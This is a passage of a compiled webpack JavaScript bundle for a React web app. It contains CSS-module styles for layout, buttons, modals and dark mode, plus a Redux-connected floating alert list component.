#1a6cfb);\n}\n.App__greenButton__V-Feog {\n  color: #fff;\n  text-shadow: 0 -1px 0 rgba(0,0,0,0.15);\n  background-color: #60b044;\n  background-image: linear-gradient(#8add6d, #60b044);\n  border-color: #5ca941;\n  font-weight: bold;\n  border-radius: 1px;\n  background: #5db93d;\n  color: #fff;\n  width: 150px;\n}\n.App__greenButton__V-Feog:hover {\n  color: #fff;\n  background-image: linear-gradient(#79d858, #569e3d);\n  border-color: #4a993e;\n}\n.App__greenButton__V-Feog:hover {\n  background: #5dcd3d;\n}\n.App__grayButton__O1J297 {\n  background: linear-gradient(to bottom, #fcfcfc, #eee);\n  border: 1px solid #d9d9d9;\n  color: #4a4a4a;\n/*\n  New Redesign Buttons\n  DEBUG: Folders\n  */\n  display: inline-block;\n}\n.App__grayButton__O1J297:hover {\n  background: linear-gradient(to bottom, #f7f7f7, #b3b3b3);\n  color: #4a4a4a;\n}\n.App__Tooltip__3Z-DAP {\n  display: inline-block;\n}\n/* **************************************************************************\n * Content Area\n * *************************************************************************/\n.App__contentArea__1yI8H2 {\n  flex: 1 100%;\n  display: flex;\n  overflow: auto;\n  min-height: 600px;\n}\n.App__routeHandler__ohLQL7 {\n  background: #fff;\n  flex: 1 100%;\n  overflow: hidden;\n  position: relative;\n}\n.App__InitSpinner__2Y3Lle {\n  background-color: #1b437a;\n  background-image: linear-gradient(to bottom right, #1b437a, #4589fb);\n  position: absolute;\n  top: 0;\n  left: 0;\n  right: 0;\n  bottom: 0;\n  text-align: center;\n}\n.App__InitSpinner__2Y3Lle .App__inner__3MdowL {\n  display: inline-block;\n  margin-top: 10%;\n  color: #fff;\n}\n.App__InitSpinner__2Y3Lle .App__inner__3MdowL p {\n  font-weight: 300;\n  font-size: 20px;\n}\n.App__InitSpinner__2Y3Lle .App__inner__3MdowL > .App__pulse__2bsSE- {\n  display: block;\n  text-align: center;\n  margin-top: 20px;\n  margin-bottom: 20px;\n}\n.spinner {\n  text-align: center;\n}\n.spinner .pulse {\n  display: inline-block;\n}\n/* **************************************************************************\n * Upload Modal\n * *************************************************************************/\n.App__modal__1KobDT {\n  position: absolute;\n  top: 0;\n  left: 0;\n  right: 0;\n  bottom: 0;\n  background: rgba(0,0,0,0.2);\n  z-index: 999;\n}\n.App__modalContent__GEAn55 {\n  position: absolute;\n  top: 40%;\n  left: 50%;\n  width: 100%;\n  max-width: 600px;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n  background: #fff;\n  padding: 20px;\n  border: 1px solid #979797;\n  box-shadow: 0px 2px 40px 0px rgba(0,0,0,0.3);\n  border-radius: 3px;\n  z-index: 1000;\n}\n.App__modalContent__GEAn55 button {\n  display: inline-block;\n}\n.App__modalContent__GEAn55 .App__next__uCMgVa {\n  margin-top: 20px;\n  margin-right: 0;\n  margin-left: auto;\n  height: 26px;\n  line-height: 1px;\n}\n.App__modalContent__GEAn55 .App__next__uCMgVa i {\n  margin-left: 5px;\n  font-size: 12px;\n}\n.App__modalContent__GEAn55 .App__close__1QiXZm {\n  margin-right: 0;\n  margin-left: 540px;\n  margin-bottom: 10px;\n}\n.App__modalContent__GEAn55 .App__close__1QiXZm:hover {\n  color: #d13f19;\n  font-size: 16px;\n}\n.App__modalContent__GEAn55 .App__pastedText__3795Wj {\n  width: 100%;\n  min-height: 150px;\n}\n.App__modalContent__GEAn55 .App__content__7XUgaw {\n  text-transform: uppercase;\n  font-size: 12px;\n  font-weight: 600;\n  letter-spacing: 1px;\n  border-bottom: 0;\n  border-color: #ddd;\n  background: #efefef;\n  color: #818896;\n}\n.App__modalContent__GEAn55 .App__active__3K5L2U {\n  border-top: 3px solid #245da7;\n  padding-top: 5px;\n}\n/* **************************************************************************\n * Upload\n * *************************************************************************/\ndiv.App__pre__1WBglw {\n  white-space: pre-line;\n  font-family: 'SplunkDataSans', 'Liberation Mono', Menlo, Courier, monospace;\n  padding: 20px;\n  background: #f5f6f7;\n  border: 1px solid #d6d6d6;\n  box-shadow: inset 0px 0px 5px 0px rgba(0,0,0,0.13);\n  overflow: visible;\n  overflow-wrap: break-word;\n}\n.App__contentMeta__2ZRfZX {\n  margin-right: 0;\n  margin-left: 20px;\n}\n.App__contentMeta__2ZRfZX .App__size__4TremS,\n.App__contentMeta__2ZRfZX .App__remove__Sz5fMG {\n  margin-left: 10px;\n}\n.App__contentMeta__2ZRfZX .App__remove__Sz5fMG {\n  background: transparent;\n}\n.App__contentMeta__2ZRfZX .App__remove__Sz5fMG:hover {\n  color: #d13f19;\n}\n.App__headerWithControls__3Z42LE {\n  position: relative;\n}\n.App__headerWithControls__3Z42LE .App__rightButtons__cSPCCQ {\n  position: absolute;\n  top: 50%;\n  right: 0;\n  -webkit-transform: translateY(-50%);\n          transform: translateY(-50%);\n  padding-bottom: 20px;\n}\n.App__adminButtons__355OWu {\n  display: flex;\n  border-radius: 3px 0 0 3px;\n  border: 1px solid #ddd;\n  border-bottom: none;\n  position: fixed;\n  right: 0;\n  bottom: 90px;\n  z-index: 100;\n}\n.App__adminButtons__355OWu a,\n.App__adminButtons__355OWu button {\n  text-decoration: none;\n  background: rgba(255,255,255,0.5);\n  color: #4a4a4a;\n  cursor: pointer;\n  display: block;\n  border: none;\n  padding: 7px 9px;\n  width: 36px;\n  height: 36px;\n  text-align: center;\n}\n.App__adminButtons__355OWu a:hover,\n.App__adminButtons__355OWu button:hover {\n  background: #4a4a4a;\n  color: #fff;\n}\n.App__adminButtons__355OWu a:first-child,\n.App__adminButtons__355OWu button:first-child {\n  border-radius: 3px 0 0 0;\n}\n.App__adminButtons__355OWu a:last-child,\n.App__adminButtons__355OWu button:last-child {\n  border-radius: 0 3px 0 0;\n}\n.App__adminButtons__355OWu .App__themeToggle__3817zh {\n  color: #7157d9;\n  background: #e1e0f5;\n}\n.App__adminButtons__355OWu .App__themeToggle__3817zh:hover {\n  background: #7157d9;\n  color: #fff;\n}\n.dark .App__routeHandler__ohLQL7 {\n  background: #1a1c20;\n}\n.dark .App__adminButtons__355OWu .App__themeToggle__3817zh {\n  color: #f2b824;\n  background: rgba(255,236,165,0.56);\n}\n.dark .App__adminButtons__355OWu .App__themeToggle__3817zh:hover {\n  background: #f2b824;\n  color: #4a4a4a;\n}\n.dark input:focus,\n.dark textarea:focus {\n  border-color: #626262;\n}\n.dark input::-webkit-input-placeholder,\n.dark textarea::-webkit-input-placeholder {\n  color: #fff;\n}\n.dark input:-ms-input-placeholder,\n.dark textarea:-ms-input-placeholder {\n  color: #fff;\n}\n.dark input::-ms-input-placeholder,\n.dark textarea::-ms-input-placeholder {\n  color: #fff;\n}\n.dark input::placeholder,\n.dark textarea::placeholder {\n  color: #fff;\n}\n.App__constellationButton__32zcMS {\n  background: linear-gradient(to bottom, #fcfcfc, #eee);\n  border: 1px solid #d9d9d9;\n  color: #4a4a4a;\n/*\n  New Redesign Buttons\n  DEBUG: Folders\n  */\n  border-radius: 3px;\n  font-size: 12px;\n  padding: 0px 9px;\n  -webkit-appearance: none;\n     -moz-appearance: none;\n          appearance: none;\n  display: inline-block;\n  text-decoration: none;\n  font-weight: 600;\n  text-transform: uppercase;\n  height: 26px;\n  pointer-events: none;\n}\n.App__constellationButton__32zcMS:hover {\n  background: linear-gradient(to bottom, #f7f7f7, #b3b3b3);\n  color: #4a4a4a;\n}\n.App__rotateOnHover__3bHZ2n {\n  transition: -webkit-transform 0.2s ease-out;\n  transition: transform 0.2s ease-out;\n  transition: transform 0.2s ease-out, -webkit-transform 0.2s ease-out;\n  -webkit-transform: rotate3d(0, 0, 1, 0deg);\n          transform: rotate3d(0, 0, 1, 0deg);\n}\n.App__rotateOnHover__3bHZ2n:hover {\n  -webkit-transform: rotate3d(0, 0, 1, 45deg);\n          transform: rotate3d(0, 0, 1, 45deg);\n}\n.App__background__3GHAPf {\n  position: absolute;\n  top: 0;\n  right: 0;\n  left: 0;\n  bottom: 0;\n  background: rgba(12,12,12,0.76);\n  z-index: 50;\n}\n/* **************************************************************************\n * UpsellModal\n * *************************************************************************/\n.App__UpsellModal__16zA_r .App__buttons__1BvXhG {\n  display: flex;\n  justify-content: center;\n}\n.App__UpsellModal__16zA_r .App__buttons__1BvXhG a {\n  text-decoration: none;\n  display: block;\n  width: calc(50% - 10px);\n  border-radius: 50px;\n}\n.App__UpsellModal__16zA_r .App__learnMore__EtSehE,\n.App__UpsellModal__16zA_r .App__notNow__1Xowtq {\n  color: #fff;\n  text-shadow: 0 -1px 0 rgba(0,0,0,0.15);\n  background-color: #eebd31;\n  font-weight: bold;\n  padding: 6px;\n  text-align: center;\n  max-width: 150px;\n}\n.App__UpsellModal__16zA_r .App__learnMore__EtSehE:hover,\n.App__UpsellModal__16zA_r .App__notNow__1Xowtq:hover {\n  color: #fff;\n  background: #e1ac13;\n}\n.App__UpsellModal__16zA_r .App__notNow__1Xowtq {\n  background: transparent;\n  color: #245da7;\n  margin-left: 20px;\n}\n.App__UpsellModal__16zA_r .App__notNow__1Xowtq:hover {\n  color: #245da7;\n  background: rgba(36,93,167,0.1);\n}\n.App__UpsellModal__16zA_r .App__inner__3MdowL {\n  background: #fff;\n  box-shadow: 0 1px 2px rgba(74,74,74,0.2);\n  position: absolute;\n  top: 50%;\n  left: 50%;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n  z-index: 3;\n  padding: 20px;\n  width: 500px;\n}\n.App__UpsellModal__16zA_r .App__backdrop__3Z94xS {\n  background: rgba(74,74,74,0.1);\n  position: fixed;\n  top: 0;\n  left: 0;\n  right: 0;\n  bottom: 0;\n  z-index: 2;\n}\n", ""]);

// exports
exports.locals = {
	"contentArea": "App__contentArea__1yI8H2",
	"Nav": "App__Nav__3c3-14",
	"routeHandler": "App__routeHandler__ohLQL7",
	"Footer": "App__Footer__2jKa2q",
	"SuperSpinner": "App__SuperSpinner__tJ_Trz",
	"App": "App__App__3Kc-A5",
	"orangeButton": "App__orangeButton__1QEhr5",
	"redButton": "App__redButton__DLcXCG",
	"blueButton": "App__blueButton__3nIch4",
	"greenButton": "App__greenButton__V-Feog",
	"grayButton": "App__grayButton__O1J297",
	"Tooltip": "App__Tooltip__3Z-DAP",
	"InitSpinner": "App__InitSpinner__2Y3Lle",
	"inner": "App__inner__3MdowL",
	"pulse": "App__pulse__2bsSE-",
	"modal": "App__modal__1KobDT",
	"modalContent": "App__modalContent__GEAn55",
	"next": "App__next__uCMgVa",
	"close": "App__close__1QiXZm",
	"pastedText": "App__pastedText__3795Wj",
	"content": "App__content__7XUgaw",
	"active": "App__active__3K5L2U",
	"pre": "App__pre__1WBglw",
	"contentMeta": "App__contentMeta__2ZRfZX",
	"size": "App__size__4TremS",
	"remove": "App__remove__Sz5fMG",
	"headerWithControls": "App__headerWithControls__3Z42LE",
	"rightButtons": "App__rightButtons__cSPCCQ",
	"adminButtons": "App__adminButtons__355OWu",
	"themeToggle": "App__themeToggle__3817zh",
	"constellationButton": "App__constellationButton__32zcMS",
	"rotateOnHover": "App__rotateOnHover__3bHZ2n",
	"background": "App__background__3GHAPf",
	"UpsellModal": "App__UpsellModal__16zA_r",
	"buttons": "App__buttons__1BvXhG",
	"learnMore": "App__learnMore__EtSehE",
	"notNow": "App__notNow__1Xowtq",
	"backdrop": "App__backdrop__3Z94xS"
};

/***/ }),
/* 3651 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export FloatingAlert */
/* unused harmony export FloatingAlertList */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_motion__ = __webpack_require__(911);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_motion___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_motion__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ms__ = __webpack_require__(216);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ms___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ms__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__FloatingAlertList_styl__ = __webpack_require__(3661);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__FloatingAlertList_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5__FloatingAlertList_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_alerts__ = __webpack_require__(400);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__ = __webpack_require__(42);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }









var cx = __WEBPACK_IMPORTED_MODULE_4_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_5__FloatingAlertList_styl___default.a);




var ALERT_TIMEOUT = __WEBPACK_IMPORTED_MODULE_2_ms___default()('3s');

var FloatingAlert = function (_React$Component) {
  _inherits(FloatingAlert, _React$Component);

  function FloatingAlert() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, FloatingAlert);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = FloatingAlert.__proto__ || Object.getPrototypeOf(FloatingAlert)).call.apply(_ref, [this].concat(args))), _this), _this.state = {
      timeout: null,
      visible: false
    }, _this.clearTimeout = function () {
      if (_this.state.timeout) clearTimeout(_this.state.timeout);
    }, _this.handleMouseLeave = function () {
      var timeoutInSeconds = _this.props.timeoutInSeconds;

      var alertTimeout = timeoutInSeconds ? __WEBPACK_IMPORTED_MODULE_2_ms___default()(timeoutInSeconds) : ALERT_TIMEOUT;
      _this.setState({
        timeout: setTimeout(_this.closeAlert, alertTimeout)
      });
    }, _this.closeAlert = function () {
      _this.clearTimeout();
      _this.props.onClose(_this.props.alert);
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(FloatingAlert, [{
    key: 'componentDidMount',
    value: function componentDidMount() {
      var timeoutInSeconds = this.props.timeoutInSeconds;

      var alertTimeout = timeoutInSeconds ? __WEBPACK_IMPORTED_MODULE_2_ms___default()(timeoutInSeconds) : ALERT_TIMEOUT;

      this.clearTimeout();
      this.setState({ // eslint-disable-line react/no-did-mount-set-state
        timeout: setTimeout(this.closeAlert, alertTimeout),
        visible: true
      });
    }
  }, {
    key: 'componentWillUnmount',
    value: function componentWillUnmount() {
      this.clearTimeout();
    }

    // If a timeout is currently set for this alert then clear it.

  }, {
    key: 'getEndValue',
    value: function getEndValue() {
      return {
        opacity: Object(__WEBPACK_IMPORTED_MODULE_1_react_motion__["spring"])(this.state.visible ? 1 : 0),
        right: Object(__WEBPACK_IMPORTED_MODULE_1_react_motion__["spring"])(this.state.visible ? 0 : -100)
      };
    }

    /**
     * Get the icon that pertains to the given type of alerts. Defaults to
     * no icon.
     */

  }, {
    key: 'getIcon',
    value: function getIcon() {
      var type = this.props.alert.get('type');
      switch (type) {
        case 'success':
          return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: 'fa fa-check-circle' });
        case 'info':
          return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: 'fa fa-info-circle' });
        case 'warning':
          return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: 'fa fa-exclamation-triangle' });
        case 'error':
          return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: 'fa fa-exclamation-circle' });
        default:
          return null;
      }
    }
  }, {
    key: 'render',
    value: function render() {
      var _this2 = this;

      var alert = this.props.alert;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'li',
        {
          'data-cy': 'floating-alert',
          onClick: this.closeAlert,
          onMouseEnter: this.clearTimeout,
          onMouseLeave: this.handleMouseLeave },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_1_react_motion__["Motion"],
          {
            defaultStyle: {
              opacity: 0,
              right: -100
            },
            style: this.getEndValue() },
          function (values) {
            return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              'div',
              {
                'data-cy': alert.get('type') + '-alert',
                style: {
                  opacity: values.opacity,
                  right: values.right
                },
                className: cx('alert', alert.get('type'), { visible: _this2.state.visible }) },
              __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                'div',
                { className: __WEBPACK_IMPORTED_MODULE_5__FloatingAlertList_styl___default.a.icon },
                _this2.getIcon()
              ),
              __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                'div',
                { className: __WEBPACK_IMPORTED_MODULE_5__FloatingAlertList_styl___default.a.text },
                alert.get('htmlMessage') || alert.get('text')
              ),
              __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                'div',
                { className: __WEBPACK_IMPORTED_MODULE_5__FloatingAlertList_styl___default.a.button },
                __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components_Button__["e" /* IconButtonPure */], { transparent: true, fill: 'none', icon: __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["s" /* IconLookup */].CROSS })
              )
            );
          }
        )
      );
    }
  }]);

  return FloatingAlert;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/**
 * A list of alerts. This can include errors, warnings, etc. Much like
 * the console API.
 */

var FloatingAlertList = function (_React$Component2) {
  _inherits(FloatingAlertList, _React$Component2);

  function FloatingAlertList() {
    var _ref2;

    var _temp2, _this3, _ret2;

    _classCallCheck(this, FloatingAlertList);

    for (var _len2 = arguments.length, args = Array(_len2), _key2 = 0; _key2 < _len2; _key2++) {
      args[_key2] = arguments[_key2];
    }

    return _ret2 = (_temp2 = (_this3 = _possibleConstructorReturn(this, (_ref2 = FloatingAlertList.__proto__ || Object.getPrototypeOf(FloatingAlertList)).call.apply(_ref2, [this].concat(args))), _this3), _this3.handleCloseAlert = function (alert) {
      _this3.props.deleteAlert(alert);
    }, _temp2), _possibleConstructorReturn(_this3, _ret2);
  }

  _createClass(FloatingAlertList, [{
    key: 'render',
    value: function render() {
      var _this4 = this;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'ul',
        { className: cx('FloatingAlertList') },
        this.props.alerts.map(function (alert) {
          return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(FloatingAlert, {
            key: alert.get('id'),
            onClose: _this4.handleCloseAlert,
            alert: alert });
        })
      );
    }
  }]);

  return FloatingAlertList;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

var mapStateToProps = function mapStateToProps(state) {
  return {
    alerts: __WEBPACK_IMPORTED_MODULE_6_modules_alerts__["getters"].alertList(state)
  };
};

var dispatchProps = {
  deleteAlert: __WEBPACK_IMPORTED_MODULE_6_modules_alerts__["actions"].deleteAlert
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_3_react_redux__["connect"])(mapStateToProps, dispatchProps)(FloatingAlertList));

/***/ }),
/* 3652 */,
/* 3653 */,
/* 3654 */,
/* 3655 */,
/* 3656 */,
/* 3657 */,
/* 3658 */,
/* 3659 */,
/* 3660 */,
/* 3661 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3662);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../../node_modules/css-loader/index.js??ref--2-1!../../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../../node_modules/stylus-loader/index.js!./FloatingAlertList.styl", function() {
			var newContent = require("!!../../../../node_modules/css-loader/index.js??ref--2-1!../../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../../node_modules/stylus-loader/index.js!./FloatingAlertList.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3662 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, "/* **************************************************************************\n * AlertList\n * *************************************************************************/\n.FloatingAlertList__FloatingAlertList__12-Wgh {\n  position: absolute;\n  top: 130px;\n  left: 50%;\n  z-index: 1600;\n  width: 726px;\n  margin-left: -361px;\n}\n.FloatingAlertList__FloatingAlertList__12-Wgh li {\n  display: block;\n  text-align: right;\n  margin-bottom: 10px;\n}\n.FloatingAlertList__alert__1B0puM {\n  position: relative;\n  padding: 20px;\n  display: inline-block;\n  text-align: left;\n  display: table;\n}\n.FloatingAlertList__alert__1B0puM > div {\n  display: inline-block;\n  display: table-cell;\n  vertical-align: middle;\n}\n.FloatingAlertList__alert__1B0puM .FloatingAlertList__icon__3FYgqE,\n.FloatingAlertList__alert__1B0puM .FloatingAlertList__button__2ZwvWo {\n  width: 20px;\n}\n.FloatingAlertList__alert__1B0puM .FloatingAlertList__icon__3FYgqE svg,\n.FloatingAlertList__alert__1B0puM .FloatingAlertList__button__2ZwvWo svg {\n  width: 20px;\n}\n.FloatingAlertList__alert__1B0puM .FloatingAlertList__icon__3FYgqE i {\n  margin-right: 20px;\n}\n.FloatingAlertList__alert__1B0puM .FloatingAlertList__text__1ZyDPC {\n  overflow-wrap: break-word;\n  word-wrap: break-word;\n  word-break: break-all;\n  word-break: break-word;\n  width: 100%;\n  line-height: 1.5;\n}\n.FloatingAlertList__alert__1B0puM button {\n  padding: 0;\n  background: transparent;\n  color: inherit;\n  display: inline-block;\n}\n.FloatingAlertList__alert__1B0puM {\n  background: #aaa;\n  border: 1px solid #ddd;\n  color: #4a4a4a;\n  border-radius: 3px;\n  transition: color 0.2s ease-out, background-color 0.2s ease-out, border-color 0.2s ease-out;\n}\n.FloatingAlertList__success__2kFPok.FloatingAlertList__success__2kFPok {\n  background-color: #dff0d8;\n  border-color: #8ac28b;\n  color: #3c763d;\n}\n.FloatingAlertList__success__2kFPok.FloatingAlertList__success__2kFPok:hover {\n  color: #4a4a4a;\n  background-color: #daedd1;\n  border-color: #5eab60;\n}\n.FloatingAlertList__success__2kFPok.FloatingAlertList__success__2kFPok button {\n  color: #a8c39d;\n}\n.FloatingAlertList__success__2kFPok.FloatingAlertList__success__2kFPok button:hover {\n  color: #3c763d;\n}\n.FloatingAlertList__info__1NkrvD.FloatingAlertList__info__1NkrvD {\n  background-color: #f1daef;\n  border-color: #a3439e;\n  color: #a3439e;\n}\n.FloatingAlertList__info__1NkrvD.FloatingAlertList__info__1NkrvD:hover {\n  color: #4a4a4a;\n  background-color: #eed3ec;\n  border-color: #82367e;\n}\n.FloatingAlertList__info__1NkrvD.FloatingAlertList__info__1NkrvD button {\n  color: #a3439e;\n}\n.FloatingAlertList__info__1NkrvD.FloatingAlertList__info__1NkrvD button:hover {\n  color: #82367e;\n}\n.FloatingAlertList__warning__2-MEus.FloatingAlertList__warning__2-MEus {\n  background: #fcf8e3;\n  border: 1px solid #dcbf8c;\n  color: #8a6d3b;\n}\n.FloatingAlertList__warning__2-MEus.FloatingAlertList__warning__2-MEus:hover {\n  color: #4a4a4a;\n  background-color: #fbf6da;\n  border-color: #cba055;\n}\n.FloatingAlertList__warning__2-MEus.FloatingAlertList__warning__2-MEus button {\n  color: #e1dab7;\n}\n.FloatingAlertList__warning__2-MEus.FloatingAlertList__warning__2-MEus button:hover {\n  color: #c9bc7d;\n}\n.FloatingAlertList__error__J8MmDV.FloatingAlertList__error__J8MmDV {\n  background: #f2dede;\n  border: 1px solid #dd9c9b;\n  color: #a94442;\n}\n.FloatingAlertList__error__J8MmDV.FloatingAlertList__error__J8MmDV:hover {\n  color: #4a4a4a;\n  background-color: #efd7d7;\n  border-color: #ca6463;\n}\n.FloatingAlertList__error__J8MmDV.FloatingAlertList__error__J8MmDV button {\n  color: #deabab;\n}\n.FloatingAlertList__error__J8MmDV.FloatingAlertList__error__J8MmDV button:hover {\n  color: #c87373;\n}\n", ""]);

// exports
exports.locals = {
	"FloatingAlertList": "FloatingAlertList__FloatingAlertList__12-Wgh",
	"alert": "FloatingAlertList__alert__1B0puM",
	"icon": "FloatingAlertList__icon__3FYgqE",
	"button": "FloatingAlertList__button__2ZwvWo",
	"text": "FloatingAlertList__text__1ZyDPC",
	"success": "FloatingAlertList__success__2kFPok",
	"info": "FloatingAlertList__info__1NkrvD",
	"warning": "FloatingAlertList__warning__2-MEus",
	"error": "FloatingAlertList__error__J8MmDV"
};

/***/ }),
/* 3663 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_components__ = __webpack_require__(295);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_icons__ = __webpack_require__(1624);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__AppHeader_styl__ = __webpack_require__(3667);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__AppHeader_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8__AppHeader_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_router_getters__ = __webpack_require__(912);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_app__ = __webpack_require__(179);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_enclave__ = __webpack_require__(296);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__search_SearchBar__ = __webpack_require__(3669);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_trustar_components_VerticalSeperator__ = __webpack_require__(3673);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_trustar_2_0_themes_default__ = __webpack_require__(162);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18__browse_components_DropdownWrap__ = __webpack_require__(1490);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19_components_ConnectedDesignProvider__ = __webpack_require__(563);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20_modules_app_constants__ = __webpack_require__(172);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

